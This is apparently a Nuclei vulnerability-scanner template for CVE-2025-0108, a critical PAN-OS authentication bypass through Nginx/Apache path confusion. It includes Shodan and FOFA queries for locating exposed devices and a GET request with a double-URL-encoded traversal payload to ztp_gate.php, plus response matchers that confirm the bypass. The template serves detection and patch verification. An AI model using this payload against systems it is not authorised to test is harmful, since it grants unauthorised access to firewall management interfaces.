id: CVE-2025-0108 info: name: PAN-OS Management Interface - Path Confusion to Authentication Bypass author: halencarjunior,ritikchaddha severity: critical description: | A vulnerability in PAN-OS management interface allows authentication bypass through path confusion between Nginx and Apache handlers.The issue occurs due to differences in path processing between Nginx and Apache, where double URL encoding combined with directory traversal can bypass authentication checks enforced by X-pan-AuthCheck header. impact: | Unauthenticated attackers can exploit path confusion between Nginx and Apache to bypass authentication completely, gaining unauthorized access to the PAN-OS management interface and potentially compromising the entire firewall infrastructure. remediation: | Upgrade to the patched version of PAN-OS as specified in the vendor security advisory. reference: - https://slcyber.io/blog/nginx-apache-path-confusion-to-auth-bypass-in-pan-os/ classification: epss-score: 0.94115 epss-percentile: 0.99914 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cve-id: CVE-2025-0108 cwe-id: CWE-287 metadata: verified: true max-request: 1 vendor: paloaltonetworks product: pan-os fofa-query: icon_hash="-631559155" shodan-query: - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" - http.favicon.hash:"-631559155" tags: cve,cve2025,panos,auth-bypass,kev,vkev,vuln http: - method: GET path: - "{{BaseURL}}/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css" matchers: - type: dsl dsl: - 'contains_any(body, "Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")' - 'contains(header, "text/html")' - 'status_code == 200' condition: and # digest: 4b0a004830460221009cd940e101acbf0b5374634c90508a839f17504378682ed65fb311117e93d30b022100e591aaaaf4165c7450c7f60649609666f5d46939de7d0cad5108154b29c920df:922c64590222798bb761d5b6d8e72950